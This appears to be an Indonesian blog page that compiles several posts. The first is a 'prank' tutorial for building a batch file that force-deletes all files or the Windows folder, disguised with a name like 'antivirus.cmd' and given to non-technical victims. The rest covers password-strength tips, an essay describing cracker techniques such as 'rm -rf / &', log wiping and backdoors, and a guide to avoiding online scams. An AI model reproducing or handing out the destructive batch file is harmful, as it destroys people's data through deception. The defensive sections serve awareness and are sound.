Perintah CMD yg asyik bwt seru2an

Untuk men-delete semua file/folder, anda cuma perlu melakukan ini:
DEL /F /Q *Ketik/copy tulisan tsb Di notepad, kemudian save menjadi *.cmd
(ex:antivirus.cmd)Itu akan men-delete semua data yg ada di komputer walaupun itu file/folder read-only dan anda tidak akan diberi konfirmasi untuk melakukan hal itu. Anda tidak akan bisa melakukan apapun jika anda sudah meng-klik file cmd tsb.PERINGATAN: JANGAN PERNAH SEKALI-KALI ANDA MENCOBA MENG-KLIK JIKA ANDA TELAH MENCIPTAKANNYA, ITU AKAN MERUSAK KOMPUTER ANDA SENDIRI

Jika anda ingin mencoba virus ini, lakukan ini:

Pertama, buat text file bernama TEST.txt di C:\
Selanjutnya, buka notepad, tulis “del C:\TEST.txt” (tanpa tanda quota/”), lalu “Save As…” dan save dengan nama “Percobaan.cmd”(Juga tanpa tanda quota/”)
Berikutnya, klik Percobaan.cmd tadi dan buka drive C:\ anda dan anda akan melihat file TEST.txt anda menghilang

Petunjuk yg simpel:
Buka notepad, tulis DEL /F /Q C:\WINDOWS (kalo anda orang yg tidak terlalu kejam, hapus windowsnya aja, kasian korbannya), kemudian save dengan nama *.cmd (namanya terserah anda, yg penting formatnya .cmd), lalu berikan ini kepada korban yg anda inginkan. Sekali korban membuka/meng-klik file ini, maka WINDOWSnya akan hilang dan dia harus meng-install WINDOWSnya lagi. Dijamin, datanya ilang semua karena dia harus install ulang WINDOWSnya (kalo kita install windows kan datanya terhapus smua, kecuali dia emang ahli komputer, tapi kan pasti kita kasih ni virus sama orang2 yg rada2 gaptech, jd dia ga bs bedain ini virus ato nggak. So, dia asal klik aja deh).

PERINGATAN: INI ADALAH VIRUS YANG SANGAT KUAT, SAYA TIDAK BISA MENJAMIN KEAMANAN ANDA JIKA ANDA MENCOBA MEMBUKA/MENG-KLIK VIRUS INI PADA KOMPUTER ANDA SENDIRI

Cil, terusannya mana......

Bagaimana membuat password yang sulit dibobol hacker?

gambar gembok + kunci password yang kuat dan sulit dibobolJaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?

Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

Cara hacker menebak password kita antara lain dengan:

  1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.
  2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
  3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

  • 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
  • password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
  • tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

  • menggunakan semua huruf kecil.
  • menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
  • mengganti huruf dengan karakter, misalnya c1nt@

Bagaimana password yang kuat dan sulit ditembus hacker?

  1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
  2. Panjang lebih dari 10 karakter.
  3. Tidak menyertakan kata-kata dalam kamus.

Password yang kuat harus mudah diingat oleh pemiliknya.

Contoh password yang kuat: 1mAu$100Ribu

Cara mengingatnya:

  • 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
  • mAu = mau
  • $ = uang
  • 100Ribu = 100 ribu

Contoh password kuat yang lain: ninG->0+1Gul

Cara mengingatnya:

  • ninG = misalnya nama orang sepesial buat Anda: Naning
  • -> = panah identik dengan adalah
  • 0+ = lambang cewek
  • 1 =berarti nomor satu atau paling
  • Gul = gula itu manis

Beberapa tips:

  1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
    • seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
    • admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
  2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
  3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
  4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
  5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

Cil, terusannya mana......

Learn to be Hacker

Oleh : Onno W. Purbo

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Cil, terusannya mana......

yang mw coba buat virus


Cil, terusannya mana......

11 Cara Penipuan Gaya Baru di Internet (cara menghindari)

Gambar cewek seksi korban penipuanPenipuan di Internet sekarang merajalela, jika Anda tidak mengetahuinya, kemungkian Anda akan menjadi korban. Para penipu ini bisa mengambil uang kita dengan berbagai cara atau memfitnah kita. Yang jelas sangat merugikan kita. Penipu biasanya memanfaatkan goncangan psikologis dan membuat orang mengabaikan akal sehat. Baca kelanjutannya ya…

  1. Undian Berhadiah
    • Sering sekali ada orang yang menerima email berisi Anda memenangkan undian berhadiah. Bisa dari Yahoo, Microsoft, atau yang lain. Jangan mempercayai email ini. Jika Anda penasaran sekali, kontak langsung Yahoo atau Microsoft atau siapapun yang dikabarkan dalam email tersebut akan memberi hadiah.
    • Pencegahan: Jangan percaya apalagi transfer uang terlebih dahulu sebelum Anda memastikan kebenaran undian berhadiah.
  2. Bisnis Palsu
    • Bisnis ini biasanya MLM (Anda harus merekrut member). Termasuk di dalam kategori ini adalah HYIP (High Yield Investment Program). HYIP bukan bisnis investasi tetapi permainan uang.
    • Pencegahan: Mendapatkan uang dengan mudah itu tidak ada. Selidiki siapa yang menyelenggrakan bisnis tersebut (alamat, badan hukum) jika akan bergabung dengan suatu bisnis..
  3. Phising
    • Phising adalah teknik penipuan untuk mencuri password Anda atau informasi pribadi Anda. Pelaku phising sering membuat website palsu yang mirip dengan aslinya, sehingga korban memasukkan nomor rekening dan password di website penipu.
    • Pencegahan: jangan mengklik link di email, selalu periksa URL sebelum login. Misalnya jika mau login ke yahoo mail, pastikan URL-nya mail.yahoo.com.
  4. Program Pay To
    • Anda mendapat tawaran untuk mengikuti program yang akan membayar Anda jika Anda mengklik email atau banner. Diantaranya memang mereka membayar Anda, namun sebagian besar mereka tidak membayar Anda. Ciri-ciri penyelenggara bisnis ini yang menipu adalah jika mereka menyaratkan Anda harus memperoleh poin sejumlah tertentu (misalnya 100 USD) sebelum mereka membayar Anda. Kenyataannya, poin Anda tidak pernah mencapai jumlah ini.
    • Pencegahan: Tidak mengikuti program ini, kalau Anda tertarik mengikuti, selalu memeriksa forum yang membahas program tersebut dan mencari tahu apakah membernya dibayar.
  5. Piramida Uang
    • Mirip MLM tapi tanpa produk. Anda diminta untuk mentransfer uang ke nama nomer pertama, Anda masuk ke nomor terakhir. Anda diminta menyebarkan email tersebut ke banyak orang. Bisnis seperti ini tidak berjalan dan hanya membuang waktu Anda.
    • Pencegahan: Tidak mengikuti bisnis piramida uang.
  6. Pencucian Uang
    • Anda mendapat email bahwa ada harta warisan yang perlu dicairkan. Anda diminta membantu dengan menyediakan rekening bank untuk ditransfer. Uangnya sebenarnya tidak ada, kalaupun ada dan ditransfer ke rekening Anda, uang itu adalah hasil curian dan Anda akan berurusan dengan hukum.
    • Pencegahan: Jangan pernah tergiur dengan penawaran ini.
  7. Hacking & Cracking
    • Anda tiba-tiba tidak bisa login di email, password salah terus! Padahal Anda merasa tidak pernah mengganti password. Atau E-gold atau paypal Anda tiba-tiba habis ada yang menguras. Pelakunya adalah hacker atau cracker yang mencuri password Anda dan mentransfer ke rekening mereka.
    • Pencegahan: Selalu memasang antivirus dan tidak mengakses rekening online di warnet, selalu gunakan komputer pribadi jika Anda harus mengakses rekening online.
  8. Software yang berisi virus / trojan
    • Anda mendownload software dan merasa nyaman menggunakannya. Tiba-tiba rekening Anda ada yang membobol.
    • Pencegahan: Selalu gunakan antivirus terbaru yang sudah diupdate ketika membuka Internet.
  9. Penyedia layanan email palsu
    • Anda mendapat email yang berisi iklan bahwa ada sebuah layanan email yang sangat fantastis, misalnya tanpa batasan kapasitas, anonim, bahkan Anda akan mendapat dollar jika registrasi. Itu semua bohong. Jika Anda menggunakan email tersebut, maka data-data pribadi Anda akan dicuri oleh penyedia email palsu tersebut.
    • Pencegahan: Jangan mendaftar email ke tempat yang tidak dapat dipercaya, gunakan yahoo atau gmail yang terpercaya.
  10. Email palsu (Fake Mail)
    • Anda mendapat e-mail seolah-olah dari admin yahoo, admin e-gold atau paypal. Email ini menyatakan Anda harus login untuk verifikasi data. Anda sangat terkejut dan segera membuka link yang ada dalam pesan email tersebut. Anda diminta memasukkan password Anda. Jika ini terjadi berarti Anda telah tertipu, karena mengirimkan password ke hacker / cracker.
    • Pencegahan: Jangan mengklik link dalam email, apalagi setelah Anda klik, Anda harus memasukkan password Anda. Ini halaman palsu.
  11. Email Berantai (Chain / Hoax Letter)
    • Anda pasti sering mendapatkan email yang menganjurkan untuk meneruskan pesan (forward) tersebut ke orang lain. Mungkin ada ancaman atau Anda ingin membantu seseorang, atau dengan meneruskan email tersebut Anda akan mendapatkan hadiah. Hampir semua email berantai adalah bohong. Hanya membuang waktu Anda.
    • Pencegahan: Jangan meneruskan email yang menyarankan Anda untuk meneruskan email kepada orang lain.

Berhati-hatilah! Ada dua pedoman penting:

  1. Berhati-hati dan tidak mudah percaya.
  2. Sesuatu yang terlalu bagus untuk ada, itu berarti tidak ada.

Cil, terusannya mana......